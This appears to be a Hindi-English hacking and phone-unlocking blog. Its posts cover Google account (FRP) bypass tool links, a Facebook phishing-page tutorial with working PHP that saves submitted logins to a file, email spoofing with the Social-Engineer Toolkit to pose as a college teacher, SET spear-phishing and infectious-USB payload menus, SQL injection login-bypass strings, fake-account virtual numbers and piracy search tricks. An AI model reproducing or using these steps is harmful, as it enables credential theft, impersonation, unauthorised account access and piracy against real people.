Online Remote Unlocking Auth server All tool actived Renew Tool credit (FRP, KG,MDM, KNOW) Whatsapp Me +91 9923050420 ( PAN - INDIA Services )
Wednesday, 8 May 2024
Tuesday, 30 April 2024
Realme C33 Frp Bypass Latest Security Update 2024 (RMX3627) Google Account Bypass Free Tool
Realme C33 Frp Bypass Latest Security Update 2024 (RMX3627) Google Account Bypass Free Tool
file: https://drive.google.com/drive/folders/1-cLZxrzxCKK1noyYqHqVsHN5zZkq_vsN
TOOL - https://spdflashtool.com/research-tool/spd-research-tool-r4-0-0001#google_vignette
VIDEO - https://www.youtube.com/watch?v=A6z3SIz9dIk
Thursday, 21 September 2023
Create Facebook Phishing Page:
Create Facebook Phishing Page:
Phishing is the technique to create a similar type of web page to the existing web page. Phishing is a type of attack where the intruders disguising as trustworthy agents attempt to gain your personal information such as passwords, credit card numbers, or any other information.
Steps to Create Facebook Phishing Page:
- Open the Facebook login page in your browser.
- Press ctrl+U to find the source code.
- Copy whole source code and create a PHP file (index.php) and paste it.
- Now, search for string methode=”POST”, it will give you two results first for login and second for register.
- Next, replace the action file name as “xyz.php” in the login form.
- Now create a file “xyz.php” and “log.txt” and paste below code in “xyz.php”.
File name: xyz.php
<?php // Set the location to redirect the page // Open the text file in writing mode $file = fopen("log.txt", "a"); foreach($_POST as $variable => $value) { fwrite($file, $variable); fwrite($file, "="); fwrite($file, $value); fwrite($file, "\r\n");} fwrite($file, "\r\n");fclose($file);exit;?> |
Now you are done, share the page and if anyone will enter username and password then it will save into the log.txt file.
Sunday, 10 September 2023
Fb Hack Recover Trick 2023 | How To Recover Facebook Hacked Account
Fb Hack Recover Trick 2023 | How To Recover Facebook Hacked Account Without Phone Number & Email Id
video
https://www.youtube.com/watch?v=eBP78gl6NC0
Virtual Numbers can be used to verify multiple accounts like gmail, facebook, instagram, whatsapp etc etc
Virtual Numbers can be used to verify multiple accounts
like gmail, facebook, instagram, whatsapp etc etc
( Make sure to make fake accounts only as these numbers are accessed by many users )
Websites which offer Virtual Number?
Free Link Virtual Number
https://voice.google.com/u/0/signup
https://receive-sms-online.info/
Paid Numbers ( Paid Solution, Rs 20-30 rs per otp )
Use multiple accounts like gmail, facebook, instagram, whatsapp etc etc
Saturday, 29 July 2023
Bug Bounty Program
Bug Bounty Program
Hindi => Ye below website pr list h sabh companies ki, jo abhi offer derhi h ki aap unki website hack kro or kmiya find kro unki app main and vo apko paise degi iske badle
English => Open below website and you will find list of all companies offering Bug Bounty Program
- Sql Injections
- Cross Site Scripting (Xss)
- Broken Authentication & Session Management
- Insecure Direct Object References
- Cross Site Request Forgery
- Insecure Cryptographic Storage
- Failure To Restrict Url Access
- Insufficient Transport Layer Protection
- Security Misconfiguration
- Cross-Site Request Forgery (Csrf)
- Unvalidated Redirects And Forwards
- & Many more!
Explanation of these topics? How to perform these attacks?
SQL इंजेक्शन (SQLi) क्या है
SQL इंजेक्शन (SQLi) क्या है
SQL इंजेक्शन (SQLi) क्या है
SQL इंजेक्शन (SQLi) एक प्रकार का इंजेक्शन हमला है जो दुर्भावनापूर्ण SQL कथनों को निष्पादित करना संभव बनाता है। ये कथन वेब एप्लिकेशन के पीछे डेटाबेस सर्वर को नियंत्रित करते हैं। एप्लिकेशन सुरक्षा उपायों को बायपास करने के लिए हमलावर SQL इंजेक्शन कमजोरियों का उपयोग कर सकते हैं। वे किसी वेब पेज या वेब एप्लिकेशन के प्रमाणीकरण और प्राधिकरण के आसपास जा सकते हैं और संपूर्ण SQL डेटाबेस की सामग्री को पुनः प्राप्त कर सकते हैं। वे डेटाबेस में रिकॉर्ड जोड़ने, संशोधित करने और हटाने के लिए SQL इंजेक्शन का भी उपयोग कर सकते हैं।
SQL इंजेक्शन भेद्यता किसी भी वेबसाइट या वेब एप्लिकेशन को प्रभावित कर सकती है जो MySQL, Oracle, SQL सर्वर या अन्य जैसे SQL डेटाबेस का उपयोग करती है। अपराधी इसका उपयोग आपके संवेदनशील डेटा तक अनधिकृत पहुंच प्राप्त करने के लिए कर सकते हैं: ग्राहक जानकारी, व्यक्तिगत डेटा, व्यापार रहस्य, बौद्धिक संपदा, और बहुत कुछ। SQL इंजेक्शन हमले सबसे पुराने, सबसे प्रचलित और सबसे खतरनाक वेब एप्लिकेशन कमजोरियों में से एक हैं।
SQL इंजेक्शन हमला कैसे और क्यों किया जाता है
SQL इंजेक्शन हमला करने के लिए, एक हमलावर को पहले वेब पेज या वेब एप्लिकेशन के भीतर कमजोर उपयोगकर्ता इनपुट ढूंढना होगा। एक वेब पेज या वेब एप्लिकेशन जिसमें SQL इंजेक्शन भेद्यता होती है, ऐसे उपयोगकर्ता इनपुट को सीधे SQL क्वेरी में उपयोग करता है। हमलावर इनपुट सामग्री बना सकता है. ऐसी सामग्री को अक्सर दुर्भावनापूर्ण पेलोड कहा जाता है और यह हमले का मुख्य हिस्सा है। हमलावर द्वारा यह सामग्री भेजने के बाद, डेटाबेस में दुर्भावनापूर्ण SQL कमांड निष्पादित किए जाते हैं।
SQL एक क्वेरी भाषा है जिसे रिलेशनल डेटाबेस में संग्रहीत डेटा को प्रबंधित करने के लिए डिज़ाइन किया गया था। आप इसका उपयोग डेटा तक पहुंचने, संशोधित करने और हटाने के लिए कर सकते हैं। कई वेब एप्लिकेशन और वेबसाइटें सारा डेटा SQL डेटाबेस में संग्रहीत करती हैं। कुछ मामलों में, आप ऑपरेटिंग सिस्टम कमांड चलाने के लिए SQL कमांड का भी उपयोग कर सकते हैं। इसलिए, एक सफल SQL इंजेक्शन हमले के बहुत गंभीर परिणाम हो सकते हैं।
- हमलावर डेटाबेस में अन्य उपयोगकर्ताओं की साख खोजने के लिए SQL इंजेक्शन का उपयोग कर सकते हैं। फिर वे इन उपयोगकर्ताओं का प्रतिरूपण कर सकते हैं। प्रतिरूपित उपयोगकर्ता सभी डेटाबेस विशेषाधिकारों वाला एक डेटाबेस प्रशासक हो सकता है।
- SQL आपको डेटाबेस से डेटा चुनने और आउटपुट करने देता है। SQL इंजेक्शन भेद्यता हमलावर को डेटाबेस सर्वर में सभी डेटा तक पूर्ण पहुंच प्राप्त करने की अनुमति दे सकती है।
- SQL आपको डेटाबेस में डेटा बदलने और नया डेटा जोड़ने की सुविधा भी देता है। उदाहरण के लिए, एक वित्तीय एप्लिकेशन में, एक हमलावर शेष राशि को बदलने, लेनदेन को रद्द करने या अपने खाते में धन हस्तांतरित करने के लिए SQL इंजेक्शन का उपयोग कर सकता है।
- आप डेटाबेस से रिकॉर्ड हटाने, यहां तक कि टेबल ड्रॉप करने के लिए SQL का उपयोग कर सकते हैं। भले ही व्यवस्थापक डेटाबेस बैकअप बनाता है, डेटा हटाने से डेटाबेस बहाल होने तक एप्लिकेशन की उपलब्धता प्रभावित हो सकती है। साथ ही, बैकअप नवीनतम डेटा को कवर नहीं कर सकता है।
- कुछ डेटाबेस सर्वर में, आप डेटाबेस सर्वर का उपयोग करके ऑपरेटिंग सिस्टम तक पहुंच सकते हैं। यह जानबूझकर या आकस्मिक हो सकता है. ऐसे मामले में, एक हमलावर प्रारंभिक वेक्टर के रूप में SQL इंजेक्शन का उपयोग कर सकता है और फिर फ़ायरवॉल के पीछे आंतरिक नेटवर्क पर हमला कर सकता है।
SQL इंजेक्शन हमले कई प्रकार के होते हैं: इन-बैंड SQLi (डेटाबेस त्रुटियों या UNION कमांड का उपयोग करके), ब्लाइंड SQLi, और आउट-ऑफ़-बैंड SQLi। आप निम्नलिखित लेखों में उनके बारे में अधिक पढ़ सकते हैं: ब्लाइंड SQL इंजेक्शन: यह क्या है।
सरल SQL इंजेक्शन उदाहरण
पहला उदाहरण बहुत सरल है. यह दिखाता है कि कैसे एक हमलावर एप्लिकेशन सुरक्षा से बचने और व्यवस्थापक के रूप में प्रमाणित करने के लिए SQL इंजेक्शन भेद्यता का उपयोग कर सकता है।
निम्नलिखित स्क्रिप्ट एक वेब सर्वर पर निष्पादित छद्मकोड है। यह उपयोगकर्ता नाम और पासवर्ड से प्रमाणित करने का एक सरल उदाहरण है। उदाहरण डेटाबेस में users निम्नलिखित कॉलमों के साथ नामित एक तालिका है: username और password।
# Define POST variables
uname = request.POST['username']
passwd = request.POST['password']
# SQL query vulnerable to SQLi
sql = “SELECT id FROM users WHERE username=’” + uname + “’ AND password=’” + passwd + “’”
# Execute the SQL statement
database.execute(sql)ये इनपुट फ़ील्ड SQL इंजेक्शन के प्रति संवेदनशील हैं। एक हमलावर इनपुट में SQL कमांड का उपयोग इस तरह से कर सकता है जो डेटाबेस सर्वर द्वारा निष्पादित SQL स्टेटमेंट को बदल देगा। उदाहरण के लिए, वे एक एकल उद्धरण वाली युक्ति का उपयोग कर सकते हैं और passwd फ़ील्ड को यहां सेट कर सकते हैं:
password' OR 1=1परिणामस्वरूप, डेटाबेस सर्वर निम्न SQL क्वेरी चलाता है:
SELECT id FROM users WHERE username='username' AND password='password' OR 1=1'कथन के कारण OR 1=1 , खंड तालिका से WHERE पहला लौटाता है, इससे कोई फर्क नहीं पड़ता कि और क्या हैं। डेटाबेस में पहला उपयोगकर्ता अक्सर प्रशासक होता है। इस तरह, हमलावर न केवल प्रमाणीकरण को दरकिनार कर देता है बल्कि प्रशासकीय विशेषाधिकार भी प्राप्त कर लेता है। वे SQL क्वेरी के निष्पादन को और अधिक नियंत्रित करने के लिए शेष SQL कथन पर भी टिप्पणी कर सकते हैं:idusersusernamepasswordid
-- MySQL, MSSQL, Oracle, PostgreSQL, SQLite
' OR '1'='1' --
' OR '1'='1' /*
-- MySQL
' OR '1'='1' #
-- Access (using null characters)
' OR '1'='1' %00
' OR '1'='1' %16यूनियन-आधारित SQL इंजेक्शन का उदाहरण
SQL इंजेक्शन के सबसे सामान्य प्रकारों में से एक UNION ऑपरेटर का उपयोग करता है। यह हमलावर को दो या दो से अधिक SELECT कथनों के परिणामों को एक ही परिणाम में संयोजित करने की अनुमति देता है। तकनीक को यूनियन -आधारित SQL इंजेक्शन कहा जाता है।
निम्नलिखित इस तकनीक का एक उदाहरण है. यह वेब पेज testphp.volnweb.com का उपयोग करता है , जो एक्यूनेटिक्स द्वारा होस्ट की गई एक जानबूझकर कमजोर वेबसाइट है।
निम्नलिखित HTTP अनुरोध एक सामान्य अनुरोध है जो एक वैध उपयोगकर्ता भेजेगा:
GET http://testphp.vulnweb.com/artists.php?artist=1 HTTP/1.1
Host: testphp.vulnweb.com
SQL इंजेक्शन को कैसे रोकें
SQL इंजेक्शन हमलों को रोकने का एकमात्र निश्चित तरीका इनपुट सत्यापन और तैयार कथनों सहित पैरामीट्रिज्ड क्वेरीज़ हैं। एप्लिकेशन कोड को कभी भी सीधे इनपुट का उपयोग नहीं करना चाहिए। डेवलपर को सभी इनपुट को सैनिटाइज करना होगा, न कि केवल लॉगिन फॉर्म जैसे वेब फॉर्म इनपुट को। उन्हें सिंगल कोट्स जैसे संभावित दुर्भावनापूर्ण कोड तत्वों को हटाना होगा। अपनी उत्पादन साइटों पर डेटाबेस त्रुटियों की दृश्यता को बंद करना भी एक अच्छा विचार है। आपके डेटाबेस के बारे में जानकारी प्राप्त करने के लिए SQL इंजेक्शन के साथ डेटाबेस त्रुटियों का उपयोग किया जा सकता है।
यदि आपको SQL इंजेक्शन भेद्यता का पता चलता है, उदाहरण के लिए एक्यूनेटिक्स स्कैन का उपयोग करके, तो आप इसे तुरंत ठीक करने में असमर्थ हो सकते हैं। उदाहरण के लिए, भेद्यता ओपन सोर्स कोड में हो सकती है। ऐसे मामलों में, आप अपने इनपुट को अस्थायी रूप से साफ़ करने के लिए वेब एप्लिकेशन फ़ायरवॉल का उपयोग कर सकते हैं।
PHP भाषा में SQL इंजेक्शन हमलों को रोकने का तरीका जानने के लिए, देखें: PHP अनुप्रयोगों में SQL इंजेक्शन कमजोरियों को रोकना और उन्हें ठीक करना। यह जानने के लिए कि इसे कई अन्य विभिन्न प्रोग्रामिंग भाषाओं में कैसे किया जाए, SQL इंजेक्शन को रोकने के लिए बॉबी टेबल्स गाइड देखें।
Thursday, 27 July 2023
How to use IP-Tracer
How to use IP-Tracer
Tool download commnd
apt upgrade
apt update
pkg install git
git clone https://github.com/rajkumardusad/IP-Tracer.git
cd IP-Tracer
chmod +x install
sh install
How to use IP-Tracer
trace -mto track your own ip address.trace -t target-ipto track other’s ip address for exampleip-tracer -t 127.0.0.1tracefor more information.
OR
ip-tracer -mto track your own ip address.ip-tracer -t target-ipto track other’s ip address for exampleip-tracer -t 127.0.0.1ip-tracerfor more information.
Wednesday, 26 July 2023
How to secure android Mobile
How to secure android Mobile
I’ve mentioned 4 apps, use those apps yourself and test it and do let me know what it does?
Install these 4 apps and do let me know how you can use these apps for Securing yourself
https://play.google.com/store/apps/details?id=app.greyshirts.firewall
https://play.google.com/store/apps/details?id=dev.ukanth.ufirewall
https://play.google.com/store/apps/details?id=eu.faircode.netguard
https://play.google.com/store/apps/details?id=co.netpatch.firewall
Note:-
agar play stor pr koi app nahi milta hai to browser se download kre.
Spear Fake Page Attack
Spear Fake Page Attack
Social Engineering Toolkit Usage:-
The Social-Engineer Toolkit (SET) is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack in a fraction of time. These kind of tools use human behaviors to trick them to the attack vectors.
Let’s learn how to use the Social Engineer Toolkit.
Step 1: − To open SET, go to Applications → Social Engineering Tools → Click “SET” Social Engineering Tool.
Step 2: − It will ask if you agree with the terms of usage. Type “y” as shown in the following screenshot.
Step 3 :− Most of the menus shown in the following screenshot are self-explained and among them the most important is the number 1 “Social Engineering Attacks”.
Step 4: − Type “1” → Enter. A submenu will open. If you press the Enter button again, you will see the explanations for each submenu.
The Spear-phishing module allows you to specially craft email messages and send them to your targeted victims with attached FileFormatmalicious payloads. For example, sending malicious PDF document which if the victim opens, it will compromise the system. If you want to spoof your email address, be sure “Sendmail” is installed (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON.
There are two options for the spear phishing attack :−
- Perform a Mass Email Attack
- Create a FileFormat Payload and a Social-Engineering Template
The first one is letting SET do everything for you (option 1), the second one is to create your own FileFormat payload and use it in your own attack.
Type “99” to go back to the main menu and then type “2” to go to “The web attack vectors”.
The web attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim. This module is used by performing phishing attacks against the victim if they click the link. There is a wide variety of attacks that can occur once they click a link.
Type “99” to return to the main menu and then type “3”.
The infectious USB/CD/DVD module will create an autorun.inf file and a Metasploit payload. The payload and autorun file is burned or copied on a USB. When DVD/USB/CD is inserted in the victim’s machine, it will trigger an autorun feature (if autorun is enabled) and hopefully compromise the system. You can pick the attack vector you wish to use: fileformat bugs or a straight executable.
Following are the options for Infectious Media Generator.
- File-Format Exploits
- Standard Metasploit Executable
Type “99” to go back to the main menu. Then, type “4” to go to “The web attack vectors”.
The create payload and listener is a simple way to create a Metasploit payload. It will export the exe file for you and generate a listener. You would need to convince the victim to download the exe file and execute it to get the shell.
Type “99” to go back to the main menu and then type “5” to go to “The web attack vectors”.
The mass mailer attack will allow you to send multiple emails to victims and customize the messages. There are two options on the mass e-mailer; the first is to send an email to a single email address. The second option allows you to import a list that has all recipient emails and it will send your message to as many people as you want within that list.
- E-Mail Attack Single Email Address
- E-Mail Attack Mass Mailer
Type “99” to go back to the main menu and then type “9” to go to “Powershell Attack Vector”.
The Powershell Attack Vector module allows you to create PowerShell specific attacks. These attacks allow you to use PowerShell, which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by preventive technologies.
Increase Followers
Increase Followers
Increase your Instagram Followers
TEST =>
Increase your Instagram Followers
Hint? =>
Monday, 24 July 2023
Setoolkit
Setoolkit How to download and use....
The Social-Engineer Toolkit (SET)
Description
The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC – an information security consulting firm located in Cleveland, Ohio.
DISCLAIMER: This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes, period. Please read the LICENSE under readme/LICENSE for the licensing of SET.
This Practical is used for Sending Email to anyone from Anyones Email ID
eg. your college Teacher email is => principal@college.com
so you can send Email to your friend’s Email ID from principal@college.com
( Use it for Educational Purpose Only )
Method is divided into 2 Parts
#1 => Smtp2go Account
#2 => setoolkit from Kali Linux
Step #1 => Create Account in Smtp2Go.com => Watch Video =>
For Email use => https://emailfake.com/ or https://temp-mail.org/en/Information to use from smtp2go.com =>
Username => Email ID
Password => Password which you mentioned while creating account
SMTP Server Port Number => 2525
SMTP Email Server Address => mail.smtp2go.com
Setoolkit via Kali Linux =>
Information To Take Care =>
Send Email to => Enter Email to whom you want to send Mail
From Mail => Enter your College Teacher Email or anyones email :p ( Enter admin@gmail.com or anything )
Download Command
sudo apt install set -y git clone https://github.com/trustedsec/social-engineer-toolkit/ setoolkit/ cd setoolkit pip3 install -r requirements.txtTool Run ke liye niche wali koi ek command use kre python setup.pysudo setoolkit
Wednesday, 19 July 2023
Google Dorks Special key words (Hacker use this )
Google Dorks Special key words
Agar apko koi game ka hack version chahie or koi Software ka free version aap simply vo software name google pr search kroge toh Google software ka link dikhayega, lekin agar 94fbr lgaoge tabh google sabh Pirated / Cracked Softwares download krne ke link dikhayega
eg. Apko Norton Antivurs download krna h, tabh aap Google pr jaakr "Norton Antivurs Download" search kroge? correct? lekin aap ek baar "Norton Antivurs 94fbr" search krke dekho, Goolgle aapko free main provide krega ye software
94fbr
Practical? => See the Difference Yourself
Left Side => Latest Movies
Right Side => Latest Movies 94fbr
Tuesday, 18 July 2023
Utorrent
Utorrent
https://1337x.to
https://thepiratebay.org
https://thepiratebay.org
Popular
|






.jpeg)







